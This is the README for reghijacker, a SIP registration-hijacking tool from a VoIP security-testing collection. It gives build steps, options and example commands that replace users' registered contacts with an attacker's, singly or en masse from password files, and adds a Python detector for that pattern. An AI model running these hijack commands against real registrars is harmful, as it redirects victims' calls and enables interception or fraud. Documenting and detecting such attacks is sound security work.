Tool to hijack SIP registrations. If successful, all existing contacts
(i.e. bindings) for the target URI (i.e. user) are deleted from the location
service used by the targeted SIP Registrar/Proxy registry, and a specified
contact is added. That contact might be completely bogus or refer to an
actual VoIP endpoint.

    Copyright (c)  2004  Mark D. Collier/Mark O'Brien
    Permission is granted to copy, distribute and/or modify this document
    under the terms of the GNU Free Documentation License, Version 1.2
    or any later version published by the Free Software Foundation;
    with no Invariant Sections, no Front-Cover Texts, and no Back-Cover Texts.
    A copy of the license is included in the section entitled "GNU
    Free Documentation License".
 
Authors:  Mark D. Collier/Mark O'Brien   09/09/2004  v1.0
          www.securelogix.com - mark.collier@securelogix.com
          www.hackingexposedvoip.com

This tool was produced with honorable intentions, which are:

  o To aid owners of VoIP infrastructure to test, audit, and uncover security
    vulnerabilities in their deployments.

  o To aid 3rd parties to test, audit, and uncover security vulnerabilities
    in the VoIP infrastructure of owners of said infrastructure who contract
    with or otherwise expressly approve said 3rd parties to assess said
    VoIP infrastructure.

  o To aid producers of VoIP infrastructure to test, audit, and uncover security
    vulnerabilities in the VoIP hardware/software/systems they produce.

  o For use in collective educational endeavors or use by individuals for
    their own intellectual curiosity, amusement, or aggrandizement - absent
    nefarious intent.
   
Unlawful use of this tool is strictly prohibited.

The following open-source libraries of special note were used to build
reghijacker:

1) hack_library [utility routines - Str2IP( ) GetNextGuid( )]
   see www.hackingexposedvoip.com

    Note: The Makefile for reghijacker presumes
          that hack_library.o and hack_library.h reside in
          a folder at ../hack_library relative to the Makefile
          within the reghijacker directory.

Install and build the libraries in accordance with their respective
instructions. Then change to the reghijacker directory and type: make
Warnings might be presented as a function of the compiler vintage.

You may invoke the tool to hijack a single user, or you may input a file of
users to hijack en masse. For the en masse approach, create or acquire a
file of usernames/passwords: one username and password per line. A possible
source for usernames/passwords might be the output of the authtool
(i.e. Authentication Tool).

Run make with the Makefile and you should be ready to go. Various warnings
might be presented as a function of the compiler vintage.

Registration Hijacker - Version 1.0
                        09/09/2004
 Usage:
 Mandatory -
        interface (e.g. eth0)
        domain to hijack (e.g. enterprise.com or an IPv4 address)
        IPv4 addr of the domain's Registrar
        hijack contact info (e.g. hacker@128.32.64.96 )
        filename into which results are written
        one of the following sets of options:
                -f filename containing user names and passwords to hijack
                        or
                -u username
                -p password
 Optional -
        -s sleep interval btwn hijacks - in usec: default is none
        -v print in verbose mode


A typical invocation of reghijacker might be:

./reghijacker eth0 enterprise1.com 10.1.101.10 hacker@10.1.101.90 results -f users -v

where:

eth0                - interface to use for hijacking
enterprise1.com     - domain whose users are to be hijacked
10.1.101.10         - IPv4 address of domain's registrar
hacker@10.1.101.90  - contact info to substitute for the hijacked user's contact info
results             - the file where results are to be written
-f users            - the file of users to hijack and their passwords
-v                  - verbose mode

or perhaps

./reghijacker eth1 enterprise2.com 10.1.102.10 hijack@10.1.102.99 outfile -u kirk -p shootfirst -v

eth1                - interface to use for hijacking
enterprise2.com     - domain whose users are to be hijacked
10.1.102.10         - IPv4 address of domain's registrar
hijack@10.1.102.99  - contact info to substitute for the hijacked user's contact info
outfile             - the file where results are to be written
-u kirk             - the user to hijack
-p shootfirst       - kirk's password
-v                  - verbose mode

Note: Even if you are working in a non-authenticated domain, you must
      use the -p option if you use the -u option. Just enter anything for
      the -p option. Sorry.
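
How the effect described at the top of this README (all bindings for a user deleted, one contact added) looks from the registrar's side, as an added example that is not part of reghijacker or its authors' code: a Python check that flags a REGISTER removing every binding for a user, followed by a REGISTER adding a contact that was not bound before. It assumes the removal uses the RFC 3261 wildcard form (Contact: * with Expires: 0), which this README does not state; the sample messages are constructed, and reg(), header() and detect_hijacks() are hypothetical names.

```python
import re

URI = re.compile(r"sips?:[^>;\s]+")

def reg(aor, contact, expires):
    """Build a constructed REGISTER request (sample data, not captured traffic)."""
    return (f"REGISTER sip:enterprise1.com SIP/2.0\r\nTo: <sip:{aor}>\r\n"
            f"Contact: {contact}\r\nExpires: {expires}\r\n\r\n")

SAMPLE = [
    reg("kirk@enterprise1.com", "<sip:kirk@10.1.101.30>", 3600),    # phone registers
    reg("spock@enterprise1.com", "<sip:spock@10.1.101.31>", 3600),
    reg("spock@enterprise1.com", "<sip:spock@10.1.101.31>", 3600),  # routine refresh
    reg("kirk@enterprise1.com", "*", 0),                             # every binding removed
    reg("kirk@enterprise1.com", "<sip:hacker@10.1.101.90>", 3600),  # unseen contact added
]

def header(msg, name):
    """Return the value of the first header called `name`, or None."""
    m = re.search(rf"^{name}\s*:\s*(.+?)\s*$", msg, re.I | re.M)
    return m.group(1) if m else None

def detect_hijacks(messages):
    """Return (aor, removed_contacts, new_contact) for each wipe-then-replace."""
    bindings, wiped, alerts = {}, {}, []
    for msg in messages:
        to, contact = header(msg, "To") or "", header(msg, "Contact") or ""
        aor, uri = URI.search(to), URI.search(contact)
        if not msg.startswith("REGISTER ") or not aor or not (uri or contact == "*"):
            continue
        aor = aor.group(0)
        expires = int(header(msg, "Expires") or 3600)  # assumed default lifetime
        known = bindings.setdefault(aor, set())
        if contact == "*":
            if expires == 0:  # RFC 3261 wildcard form: removes all bindings for the AOR
                wiped[aor] = set(known)
                known.clear()
            continue
        uri = uri.group(0)
        if expires == 0:
            known.discard(uri)  # ordinary single-binding unregister
            continue
        prior = wiped.pop(aor, None)
        if prior is not None and uri not in prior:
            alerts.append((aor, sorted(prior), uri))
        known.add(uri)
    return alerts

if __name__ == "__main__":
    for aor, removed, new in detect_hijacks(SAMPLE):
        print(f"ALERT {aor}: bindings {removed} wiped, replaced by {new}")
```

A device that wipes its bindings and re-registers the same contact is not flagged; per-contact expires parameters and compact header forms are not handled.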

-----------------------------------------------------------------------------

You may also make the mddriver and experiment with the MD5 digest
computation.

make -f makemd5c

then execute:

mddriver -x

to see the output of the MD5 digest calc for some different inputs.
Examine mddriver.c for the other mddriver command line parms.

Mark O'Brien
